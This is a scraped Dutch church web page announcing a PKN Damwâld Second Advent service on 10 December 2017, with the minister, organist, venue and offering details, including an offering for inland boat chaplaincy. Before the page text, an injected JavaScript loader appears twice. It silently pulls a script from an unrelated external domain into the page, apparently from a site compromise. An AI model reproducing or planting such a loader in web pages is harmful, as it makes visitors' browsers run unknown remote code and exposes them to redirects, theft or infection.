;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 10 december 2017 14:00 uur - PKN Damwâld
zondag 10 december 2017
14:00 uur

Kerkdienst zondag 10 december 2017 14:00 uur

Thema: Tweede Advent

Informatie

Voorganger:Ds. S. Boukes
Organist:Jelte Cuperus
Thema:Tweede Advent
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: Daar waar de schipper is

Veel schippers en hun gezin hebben een huis op de wal en zijn in die plaats aangesloten bij een kerkelijke gemeente. Maar er is ook een groot aantal varende echtparen en gezinnen voor wie het schip hun thuis is. Voor hen in het bijzonder zijn er havenkerken en binnenvaartpredikanten.
Binnenvaartpredikanten Dirk Meijvogel en Louis Krüger vormen samen met tientallen vrijwilligers het pastoraal team voor 450 schippersfamilies die varen op de waterwegen van West-Europa. Binnenvaartpredikanten willen daar zijn waar de schipper is: in crisissituaties, bij ziekte, financiële zorgen, maar ook bij vragen over geloofsopvoeding en relatieproblematiek. De vrijwilligers hebben
veel contact met de predikanten en kunnen signalen uit de schipperswereld snel doorgeven.
De predikanten reizen soms behoorlijke afstanden voor crisispastoraat. Ze stappen aan boord op een plek waar een autosteiger is en waar hun auto aan boord wordt gehesen. Na een paar uur gaan ze er weer af bijeen andere autosteiger. Ondertussen is er tijd voor pastoraal contact. Deze vorm van pastoraat is van groot belang voor schippers en hun gezinnen. De opbrengst van deze collecte is bestemd voor bijzondere vormen van pastoraat aan mensen die zich buiten het bereik van de plaatselijke gemeente bevinden, zoals pastoraat aan schippers maar ook bij voorbeeld luchthavenpastoraat.

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds